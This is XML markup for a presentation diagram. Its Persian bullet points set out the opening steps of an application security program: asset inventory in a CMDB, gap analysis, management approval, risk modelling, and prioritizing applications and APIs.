            <a:rPr lang="fa-IR" sz="1100" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>بازنشسته کنید.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{417D5543-46B5-4661-A0C7-EB02BDDBA070}" type="parTrans" cxnId="{7BAC0FCB-DC6D-4099-9E6F-6301A4DD1A6F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8601BBA7-4850-4129-A67D-315284056A22}" type="sibTrans" cxnId="{7BAC0FCB-DC6D-4099-9E6F-6301A4DD1A6F}">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lang="en-US"/>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lang="en-US"/>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lang="en-US"/>
        </a:p>
      </dgm:t>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t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>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lang="en-US"/>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lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{B663EA81-9240-5F43-A148-92ACDFE7CC44}" type="presOf" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B5FA33DE-9D44-4F58-B8A5-B7BC0D0637BE}" type="presOf" srcId="{F29C9307-D9ED-4D8D-BCA1-D31D83EDCD63}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{7815F87A-B673-4E94-9414-E953F21F6C81}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{C620EB75-CFF2-4FDE-BBCD-C455923C062F}" srcOrd="1" destOrd="0" parTransId="{10F93FBA-F7B5-4A93-91A4-A560C8D89A15}" sibTransId="{91A6D5F3-B789-4743-A0B7-A37B7AC6143A}"/>
    <dgm:cxn modelId="{051F9242-E1E2-2444-B3CE-725EAD7E4065}" type="presOf" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{C0067372-8EFD-4BF7-9155-EB6E301593C8}" type="presOf" srcId="{13018118-940A-4D80-8FD3-35CCF7EB394E}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{96E9B7FA-0D3F-4AD6-B045-22F3C6EEFD97}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{BA309DCD-75A4-479B-A3BC-1B5FC352519E}" srcOrd="1" destOrd="0" parTransId="{EF184C49-C8E8-44AE-8EAA-58D414187661}" sibTransId="{C150384F-818B-4B33-A7BB-01238497C540}"/>
    <dgm:cxn modelId="{BDA0A2DB-50A7-9E41-8394-C10237C43F67}" type="presOf" srcId="{247D57F2-8E57-4FE8-BC5D-1538DE9C7ED2}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E78389B5-80DA-4CCE-B3CB-23B203EA7019}" type="presOf" srcId="{0EAE8272-902D-4CEC-A367-E10DDDD0F34F}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>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F51E1E07-8B28-42F1-9F6E-E18132ACC6E4}" type="presOf" srcId="{CB94F752-6D3E-468B-BD32-2A9138E2C0B0}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="5" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{905BD726-97CB-44EC-B09E-F7CD8E5DC7B7}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{0A1A4285-8789-4883-9873-2CE461E20B2B}" srcOrd="1" destOrd="0" parTransId="{81515535-BE32-4056-AE26-429DBC3E6AEC}" sibTransId="{D648A13B-A4B6-4B07-A44A-AB5FE92525AB}"/>
    <dgm:cxn modelId="{22085353-E8E3-4D58-A8A9-E88C5188EE48}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{7C23B0F7-D29B-4D40-8200-640B14F827E7}" srcOrd="3" destOrd="0" parTransId="{9CBCEE78-13D8-40BF-A623-999A48C74649}" sibTransId="{D0B40011-79C9-42B1-93D3-4AF3370EE3C7}"/>
    <dgm:cxn modelId="{71620BC4-BCFE-49BB-8DBD-2B2ABF2B5658}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{FC4CE9E7-6DB1-4F94-9B3E-64A9F086639F}" srcOrd="1" destOrd="0" parTransId="{A0979CFD-8DF5-4EE3-95FE-8280E18E8BB2}" sibTransId="{54059F94-92A5-437E-960B-855F041FC425}"/>
    <dgm:cxn modelId="{8AFF51C1-D2A3-4BBE-9A37-7E7B8A59EA42}" type="presOf" srcId="{FC4CE9E7-6DB1-4F94-9B3E-64A9F086639F}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8077D3D4-26A3-4DE1-8025-E9B42F7580EE}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{20A2BCCE-1134-49FE-8523-9224BDFD1A75}" srcOrd="2" destOrd="0" parTransId="{96A06128-5F67-4381-ABD8-785266A75B00}" sibTransId="{C6274C05-97F9-4D7A-8752-7C0109DFF23C}"/>
    <dgm:cxn modelId="{82145A56-E4DD-4C92-B059-2FC2C0C9EFC4}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{F29C9307-D9ED-4D8D-BCA1-D31D83EDCD63}" srcOrd="2" destOrd="0" parTransId="{B3C1F63C-2C19-4536-87A7-D545794C86E2}" sibTransId="{455BA4FB-BA0C-418C-A5B2-B9650BF46406}"/>
    <dgm:cxn modelId="{5368E3A4-753E-674F-8CE6-22C51467BAEB}" type="presOf" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B6D0143A-F02E-401D-819B-1EF3997C8F40}" type="presOf" srcId="{BA309DCD-75A4-479B-A3BC-1B5FC352519E}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E482549B-3D8B-43AF-873F-0C5565450435}" type="presOf" srcId="{0A1A4285-8789-4883-9873-2CE461E20B2B}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="1"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BED50CD7-BE35-4652-B840-A7521F05E750}" type="presOf" srcId="{E85B5F44-0E81-48F6-97BB-8A7DA85A0437}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{84F0408F-AC61-4CAD-B61C-D9CA9613BE59}" type="presOf" srcId="{20A2BCCE-1134-49FE-8523-9224BDFD1A75}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{465F9DC1-B019-4A42-BFA1-522B01A30F39}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{0EAE8272-902D-4CEC-A367-E10DDDD0F34F}" srcOrd="2" destOrd="0" parTransId="{ACF8300B-E3E9-43BD-915E-E4B130AB8419}" sibTransId="{650E5FAF-E2FD-4985-8248-0D01B0BE371C}"/>
    <dgm:cxn modelId="{0EBC86B2-1B2E-D743-B1FC-2B9051176604}" type="presOf" srcId="{C7D43052-0DE3-42CE-8D15-E3EB141D163C}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{74725BA9-E15D-4967-B0CF-DFF7570F7526}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{AAC548F0-A86E-400B-89BE-ED8A46A1727A}" srcOrd="4" destOrd="0" parTransId="{E73D5250-8FEB-4DFC-A8AF-997DE35DE8AF}" sibTransId="{189C9C5E-3B83-4EA0-AD88-1DE4EA433B8D}"/>
    <dgm:cxn modelId="{0957F586-5356-EF45-966C-128E7F7AB956}" type="presOf" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{C17927D1-6708-4D06-8302-417370B71B49}" type="presOf" srcId="{A893349B-23EC-4958-B59D-D9622100048E}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D7CD5B4B-1A1D-4014-8859-8227BAF47530}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{5A89A079-4B22-4BAD-8079-2D037BF83888}" srcOrd="2" destOrd="0" parTransId="{9F1B7E78-610E-400A-8A74-03BD6BCC4099}" sibTransId="{BAA66786-8945-43A9-BA80-659DD4FFCE4B}"/>
    <dgm:cxn modelId="{ACE3303E-42C4-4C3B-8AB0-487B4BF90EF0}" type="presOf" srcId="{ADAC7EF6-3FDD-4FFF-996C-4903745FE1ED}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D7A2B307-6525-4F29-9CFB-4BD4E5E0449E}" type="presOf" srcId="{F756C912-B950-4003-9359-C81B780A9DB0}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{21CCE488-FA7F-384A-A5E5-F7531C2F7A2D}" type="presOf" srcId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}"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DB4CA1F8-15B9-3A4B-B718-7A58463FABD6}" type="presOf" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{049B9C20-31FF-4B03-86CF-322C6DC8564F}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{CB94F752-6D3E-468B-BD32-2A9138E2C0B0}" srcOrd="5" destOrd="0" parTransId="{F383EF60-A5F3-4D85-BD44-91F3FFD7D5EB}" sibTransId="{8F57ED5D-BCA4-4E0D-A312-31698565A364}"/>
    <dgm:cxn modelId="{366B7094-9DFA-4F1F-B75E-FDAE86EE2898}" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{9A899121-6E93-40E8-8C0A-A2BD6A9E45EA}" srcOrd="1" destOrd="0" parTransId="{277ADD5E-AD97-461B-BDC8-AE740D331082}" sibTransId="{C2255DDC-98FD-4680-9C18-F62ED912C3E4}"/>
    <dgm:cxn modelId="{40FD3D8F-931B-41DB-B83F-784373C7A594}" type="presOf" srcId="{7C23B0F7-D29B-4D40-8200-640B14F827E7}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{CE487A67-C038-4414-9A19-730DBD180940}" type="presOf" srcId="{5B910831-1AF8-4E19-A545-64782295F62C}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1E4E71D2-96F8-45DF-B3C9-1A582B476436}" type="presOf" srcId="{5A89A079-4B22-4BAD-8079-2D037BF83888}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DE3CFC80-D0CE-45A6-B4FC-60E0AF08EB4F}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{A893349B-23EC-4958-B59D-D9622100048E}" srcOrd="1" destOrd="0" parTransId="{3AB738D1-9B6A-436D-AEE4-99401AF96C1F}" sibTransId="{7505E162-5216-4C93-9D6F-8A3BD1B1A7A5}"/>
    <dgm:cxn modelId="{01616883-F220-4AB8-8A2F-763E9CD8BC97}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{5B910831-1AF8-4E19-A545-64782295F62C}" srcOrd="3" destOrd="0" parTransId="{C3D9AA28-B52C-413D-B59F-7DD66A7DDD1E}" sibTransId="{851EB148-CA5B-49DB-8BFF-E816C5DBEA8D}"/>
    <dgm:cxn modelId="{A536B4C6-BDA4-4FA6-A956-4DABD4927F92}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{1C4D27B9-4EE7-4EDD-B48C-DB14EB63A6E5}" srcOrd="4" destOrd="0" parTransId="{99A87776-A46D-4EC5-92E7-ED7E65C33E4D}" sibTransId="{333517DB-51BE-44A3-87CA-9CD8B3320C79}"/>
    <dgm:cxn modelId="{030E71EE-5B30-4711-A914-B5B1CC76B4F1}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{13018118-940A-4D80-8FD3-35CCF7EB394E}" srcOrd="3" destOrd="0" parTransId="{87D9A182-7112-4491-BD1E-040E67296088}" sibTransId="{55E7E9BC-71F1-4AA7-9F7B-1CE08FB44632}"/>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033FFE0E-178F-48D6-9214-7C07795231A7}" type="presOf" srcId="{C620EB75-CFF2-4FDE-BBCD-C455923C062F}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D25B1A61-2C17-D045-8BA8-C03D84862479}" type="presOf" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8DD7D474-6C95-45E7-BC2E-6905B6317288}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{E85B5F44-0E81-48F6-97BB-8A7DA85A0437}" srcOrd="3" destOrd="0" parTransId="{06665ED7-0D15-4A57-BC29-EE64D9B5E495}" sibTransId="{BAA09199-35DC-4C4C-9CD7-EC1BC9F3622E}"/>
    <dgm:cxn modelId="{630BF613-79F8-428F-8964-E241E474DFB8}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{247D57F2-8E57-4FE8-BC5D-1538DE9C7ED2}" srcOrd="0" destOrd="0" parTransId="{AE4D7BED-3056-429A-A072-E4C06F9FCBBF}" sibTransId="{FFAF3F5C-16AC-4210-8AC4-B4A3C7CC1B6C}"/>
    <dgm:cxn modelId="{FEE5CB95-222E-4B95-9562-67BEB4A0E2FB}" type="presOf" srcId="{AAC548F0-A86E-400B-89BE-ED8A46A1727A}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>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55D72AD2-0211-40BC-A0F3-C386D305CB1F}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" srcOrd="2" destOrd="0" parTransId="{3E44837D-D7DC-4906-821E-A6950790F46F}" sibTransId="{35F82638-1CE8-4F68-915D-3475E1D94C1A}"/>
    <dgm:cxn modelId="{7D5626C0-4D0E-480E-AFFD-E8CCBBE972C3}" type="presOf" srcId="{9A899121-6E93-40E8-8C0A-A2BD6A9E45EA}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{BB1B0F6B-1FBF-4E1B-846F-7205959C1671}" type="presOf" srcId="{1C4D27B9-4EE7-4EDD-B48C-DB14EB63A6E5}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="4"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47A8D88B-DDCB-4E6E-9C7F-AD5C9ADC7F4D}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{ADAC7EF6-3FDD-4FFF-996C-4903745FE1ED}" srcOrd="2" destOrd="0" parTransId="{4AFCD111-ACF0-4938-8A15-1448AEFEE7AF}" sibTransId="{4066018A-0122-4DE3-8174-ADFF740BE9D3}"/>
    <dgm:cxn modelId="{68D71606-5C52-434C-93A7-B1ED203D82B8}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" srcOrd="0" destOrd="0" parTransId="{0B3561F2-F580-4BA5-B06C-3004CD728F94}" sibTransId="{2CCD953C-110F-4B11-9CBE-349755B93BC6}"/>
    <dgm:cxn modelId="{7BAC0FCB-DC6D-4099-9E6F-6301A4DD1A6F}" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{F756C912-B950-4003-9359-C81B780A9DB0}" srcOrd="2" destOrd="0" parTransId="{417D5543-46B5-4661-A0C7-EB02BDDBA070}" sibTransId="{8601BBA7-4850-4129-A67D-315284056A22}"/>
    <dgm:cxn modelId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" srcOrd="0" destOrd="0" parTransId="{A201932A-BA50-4861-8522-7F31487BAA62}" sibTransId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}"/>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48012" y="-2161807"/>
          <a:ext cx="113260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just" defTabSz="422275" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR"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rPr>
            <a:t>تمام برنامه ها و دارایی های مرتبط مربوطه را مستند کنید. سازمان های بزرگ باید در نظر داشته باشند که پایگاه داده مدیریت پیکربندی (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"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rPr>
            <a:t>CMDB) </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fa-IR"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rPr>
            <a:t> را برای این منظور در نظر بگیرند.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="10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B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="466725" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR"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rPr>
            <a:t>یک برنامه امنیتی نرم افزاری ایجاد کنید و درایور را بردارید.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"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endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="466725" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR"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rPr>
            <a:t>انجام یک تجزیه و تحلیل شکاف قابلیت مقایسه سازمان خود را به همسالان خود را برای تعریف کلیدی</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"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endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="466725" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR"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rPr>
            <a:t>مناطق بهبودی و یک طرح اجرایی.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"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endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="466725" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR"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rPr>
            <a:t>به دست آوردن مدیریت تایید و ایجاد یک کمپین آگاهی امنیتی برنامه برای کل سازمان فناوری اطلاعات.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" kern="1200" dirty="0">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2089829" y="106954"/>
        <a:ext cx="5448974" cy="1022029"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1092707" y="976"/>
          <a:ext cx="94183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fa-IR" sz="1050" b="1" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>شروع </a:t>
          </a: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683" y="46952"/>
        <a:ext cx="849881" cy="1142031"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29555282-7DBF-4954-82C2-561252AD070F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4235194" y="-818832"/>
          <a:ext cx="115236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just" defTabSz="466725" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1050" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>نیازهای حفاظتی نمونه کارها را از منظر تجاری شناسایی کنید. این باید بخشی از قوانین حریم خصوصی و سایر مقررات مربوط به دارایی داده محافظت شود.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" kern="1200" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="466725" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1050" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>یک مدل رایج ریسک را با یک مجموعه سازگاری از عوامل احتمال و تاثیر گذار بر تحمل پذیری سازمان برای ریسک ایجاد کنید.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" kern="1200" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="466725" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1050" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>بر اساس این همه برنامه ها و </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1050" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>API </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fa-IR" sz="1050" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t> های خود را اندازه گیری و اولویت بندی کنید. نتایج را به</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1050" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>CMDB </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fa-IR" sz="1050" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t> اضافه کنید.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" kern="1200" noProof="0" dirty="0">
